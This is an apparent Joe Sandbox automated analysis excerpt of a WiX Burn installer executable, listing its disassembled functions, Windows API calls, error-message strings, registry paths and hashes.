                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLast$PointerSize
                                                                                                                                                                                                                                                                            • String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1903691966-2291708945
                                                                                                                                                                                                                                                                            • Opcode ID: 47c9439f653c8c24a5b75dcde515a622b05b85f97810421690a5f7830c46f28a
                                                                                                                                                                                                                                                                            • Instruction ID: 60a4576349167f7b8409aa823f2a9b6bbc75177a686031317cfb5932da827038
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47c9439f653c8c24a5b75dcde515a622b05b85f97810421690a5f7830c46f28a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5918E72E1022D9BDB368F14CC44FEEB6B9FB48740F514095B988A6290D6B0DEC19F90
                                                                                                                                                                                                                                                                            Function 009256C2 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 241COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 009256FA
                                                                                                                                                                                                                                                                            • Failed to copy install arguments for update bundle package, xrefs: 0092596A
                                                                                                                                                                                                                                                                            • Failed to copy download source for pseudo bundle., xrefs: 00925812
                                                                                                                                                                                                                                                                            • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 0092573E
                                                                                                                                                                                                                                                                            • Failed to allocate memory for update bundle payload hash., xrefs: 009258AC
                                                                                                                                                                                                                                                                            • Failed to copy filename for pseudo bundle., xrefs: 009257B1
                                                                                                                                                                                                                                                                            • Failed to copy key for pseudo bundle payload., xrefs: 00925786
                                                                                                                                                                                                                                                                            • Failed to copy local source path for pseudo bundle., xrefs: 009257DC
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp, xrefs: 009256E7, 009256F2, 0092570C, 0092572B, 00925736, 0092586E, 00925899, 009258A4, 0092597C
                                                                                                                                                                                                                                                                            • Failed to copy id for update bundle., xrefs: 00925917
                                                                                                                                                                                                                                                                            • Failed to copy cache id for update bundle., xrefs: 00925940
                                                                                                                                                                                                                                                                            • Failed to decode hash string: %ls., xrefs: 0092585C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1357844191-2400517205
                                                                                                                                                                                                                                                                            • Opcode ID: 7e22ba71c6bc5bb5efd03d4ade5ae28b77b96969c0fff3d124020a06ee5aebf3
                                                                                                                                                                                                                                                                            • Instruction ID: 38d76ed380a39e0d336ab552efc8752f23ef9ce24c0654902b7b7ed262fb3929
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e22ba71c6bc5bb5efd03d4ade5ae28b77b96969c0fff3d124020a06ee5aebf3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D271DAB1780B65BBEB219E658C46F9B7E9CFB45B24F020115BA04FB2C5E3F4D8508B91
                                                                                                                                                                                                                                                                            Function 0093BB29 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(0094639A,00000008,00000000,00000000,00000000,?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000), ref: 0093BB41
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BB4B
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,?,00000000,00000000,0094639A,?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000), ref: 0093BB9D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BBA7
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,?,00000000,0094639A,0094639A,0094639A,00000001,00000000,?,?,?,0093BECF,0094639A,00000001,00000000,00000000), ref: 0093BC33
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BC3D
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0093BECF,0094639A,00000001,00000000,00000000,00000000,?,?,0094639A), ref: 0093BCA1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastToken$Information$CloseHandleOpenProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate token information.$Failed to get information from process token size.$Failed to get information from process token.$Failed to open process token.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3038379890-2680558641
                                                                                                                                                                                                                                                                            • Opcode ID: 20e4226ebbffaf7d734fe28902733703eaea9dcb6e49503d9e7b4728cf71f9a3
                                                                                                                                                                                                                                                                            • Instruction ID: 6ab0b213eeae8b6f9368c7ea06c967d5cc63629f30739ca2c73be94407ddf422
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20e4226ebbffaf7d734fe28902733703eaea9dcb6e49503d9e7b4728cf71f9a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541D977A41225B7EB315A599C4EFAF7D6CEF02B50F014015BF48BA1D1EBB48E009AE1
                                                                                                                                                                                                                                                                            Function 008F70DA Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 111registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093CAFE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,008F7102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 0093CB9B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6DEA,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,008E6EDE,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,008E6EDE,00000000), ref: 008F71F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008F71B6
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Updates, xrefs: 008F7119
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 008F7169
                                                                                                                                                                                                                                                                            • UpdateExeVolatile, xrefs: 008F7114
                                                                                                                                                                                                                                                                            • CurrentRebootAttempts, xrefs: 008F70EA
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 008F714A
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\ServerManager, xrefs: 008F70EF
                                                                                                                                                                                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 008F7133
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 008F717F
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations2, xrefs: 008F7196
                                                                                                                                                                                                                                                                            • AUState, xrefs: 008F7164
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 008F7184, 008F719B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-3032311648
                                                                                                                                                                                                                                                                            • Opcode ID: 71fce2d85b96e8a7f09edbcb816b85735d5ff635a419692b11459ba95627865a
                                                                                                                                                                                                                                                                            • Instruction ID: 531f065880db1ffcf9c2be07a388f3ad1cb71c47ef415bea438dcd8d39da7c45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71fce2d85b96e8a7f09edbcb816b85735d5ff635a419692b11459ba95627865a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0317571E4475DB7AB21E6724C46EAF7ABCEAC0B45F100556FE00F2142DA70EE48CB60
                                                                                                                                                                                                                                                                            Function 00906971 Relevance: 22.8, APIs: 3, Strings: 10, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(008E73DE,00000000,008E6CF2,2000000A,2000000A,?,0090B226,008E6CF2,?,008E73DE,00000001,008E73DE,008E73E2,008E6DA2,008E6CF2,00000000), ref: 00906979
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,008E6CF2,00000000,00000000), ref: 00906A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: ShellExecuteExW.SHELL32 ref: 00942603
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: GetLastError.KERNEL32 ref: 00942609
                                                                                                                                                                                                                                                                              • Part of subcall function 00942587: CloseHandle.KERNEL32(?), ref: 00942659
                                                                                                                                                                                                                                                                            • GetProcessId.KERNEL32(00000000,0154B7FF,008E6CF2,runas,00000000,00000008,?,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 00906A62
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • -%ls=%ls, xrefs: 009069ED
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 009069C5, 00906A50
                                                                                                                                                                                                                                                                            • runas, xrefs: 00906A1F
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00906A82
                                                                                                                                                                                                                                                                            • burn.elevated, xrefs: 0090699A
                                                                                                                                                                                                                                                                            • Failed to set log mode in elevated process command-line., xrefs: 00906A01
                                                                                                                                                                                                                                                                            • Failed to launch elevated child process: %ls, xrefs: 00906A3E
                                                                                                                                                                                                                                                                            • burn.log.mode, xrefs: 009069E5
                                                                                                                                                                                                                                                                            • Failed to allocate parameters for elevated process., xrefs: 009069B3
                                                                                                                                                                                                                                                                            • -q -%ls %ls %ls %u, xrefs: 0090699F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CurrentErrorExecuteLastShell
                                                                                                                                                                                                                                                                            • String ID: -%ls=%ls$-q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$Failed to set log mode in elevated process command-line.$burn.elevated$burn.log.mode$d:\a\wix4\wix4\src\burn\engine\elevation.cpp$runas$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 163010291-3239411051
                                                                                                                                                                                                                                                                            • Opcode ID: 167a84838eb86cf97cc7ed44224b16917b50e015a71516209603a7bf013df52b
                                                                                                                                                                                                                                                                            • Instruction ID: 0155d6affa78f9c4d16019a677f5e7a0b6f8bc6d93ebe7a1ddd32269338e237b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 167a84838eb86cf97cc7ed44224b16917b50e015a71516209603a7bf013df52b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE31F371E80319BFDB01EF90CC4AF9EBA78FF85714F004165FA18B6180D3B12A609B90
                                                                                                                                                                                                                                                                            Function 00909734 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 233COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 009098F9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to execute compatible MSI package.$Failed to find package: %ls$Failed to read MSI compatible package id.$Failed to read MSI package id.$Failed to read package log.$Failed to read parent hwnd.$Failed to read rollback flag.$Failed to read variables.$Package '%ls' has no compatible MSI package$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1833463798
                                                                                                                                                                                                                                                                            • Opcode ID: 3c14ad897c9e05de15fc7b2e57b598a351350626f70480f11f20e5034cfc6f6c
                                                                                                                                                                                                                                                                            • Instruction ID: c493e7e6d49e19c8d93e5da468211d6d0740017a7ee56dbfa796e570711424dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c14ad897c9e05de15fc7b2e57b598a351350626f70480f11f20e5034cfc6f6c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C71D672A40259BFDB21DED5CC4AFEF7A7CEB45B10F110116BA14BA1C2D6B09A40CBA1
                                                                                                                                                                                                                                                                            Function 0094B60C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 191COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,?,0091E3CA,?), ref: 0094B63B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,?,0091E3CA,?,008E6DA2,00000000,?,008E6DA2,00000000), ref: 0094B656
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • application, xrefs: 0094B648
                                                                                                                                                                                                                                                                            • Failed to allocate default application type., xrefs: 0094B707
                                                                                                                                                                                                                                                                            • Failed to reallocate memory for update entries., xrefs: 0094B7C9
                                                                                                                                                                                                                                                                            • Failed to allocate memory for update entries., xrefs: 0094B6F9
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp, xrefs: 0094B6ED, 0094B721, 0094B7BD
                                                                                                                                                                                                                                                                            • type, xrefs: 0094B67D
                                                                                                                                                                                                                                                                            • Failed to process ATOM entry., xrefs: 0094B7DA
                                                                                                                                                                                                                                                                            • Failed to allocate default application id., xrefs: 0094B715
                                                                                                                                                                                                                                                                            • http://appsyndication.org/2006/appsyn, xrefs: 0094B62E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate default application id.$Failed to allocate default application type.$Failed to allocate memory for update entries.$Failed to process ATOM entry.$Failed to reallocate memory for update entries.$application$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                                                                                                                            • API String ID: 2664528157-2947066191
                                                                                                                                                                                                                                                                            • Opcode ID: a1f3b0db0350ffbe25117023c6dc3b46cf68b42de54c471c88a4608653e302a7
                                                                                                                                                                                                                                                                            • Instruction ID: 1e2df82cf8f9fe418e2e0d8b89ce9c2417f2f4bfa1f3dad6b1f27da905a1aac3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1f3b0db0350ffbe25117023c6dc3b46cf68b42de54c471c88a4608653e302a7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD512671784701BBEB209B54CC8AF1B77A9EB85B24F208518F625EF6D1DBB4ED008B10
                                                                                                                                                                                                                                                                            Function 009485DB Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 183fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00948654
                                                                                                                                                                                                                                                                              • Part of subcall function 0094666D: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00946717
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00948791
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 009487A0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$DeleteErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$WiX\Burn$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3163412224-1901573870
                                                                                                                                                                                                                                                                            • Opcode ID: c116cfbb4699be59bd9b9ba127828c7fad6c225e2aeba3729bf5c297933b7444
                                                                                                                                                                                                                                                                            • Instruction ID: bff512dcc8ef132bf47c85226822f21cbff7c8e902187edc9c4ce72944f701dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c116cfbb4699be59bd9b9ba127828c7fad6c225e2aeba3729bf5c297933b7444
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26514A76940219BFDF119FA4CC46FAFBBBCFB49700F104155FA14E6191EB718A10ABA1
                                                                                                                                                                                                                                                                            Function 008F00E7 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 179libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(0094E7C0,00000000,00000008,?,BundleExtensionData.xml,00000001,?,00000000,?), ref: 008F01D1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,BundleExtensionCreate), ref: 008F01E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                            • String ID: ($BundleExtensionCreate$BundleExtensionData.xml$Failed to create BundleExtension '%ls'.$Failed to get BundleExtensionCreate entry-point '%ls'.$Failed to get BundleExtensionDataPath.$Failed to load BundleExtension DLL '%ls': '%ls'.$d:\a\wix4\wix4\src\burn\engine\burnextension.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2574300362-4260127901
                                                                                                                                                                                                                                                                            • Opcode ID: 16be3e66dc237a945e8b05ebb80d35e76b65a9b17bf97a2119bb534e719bd180
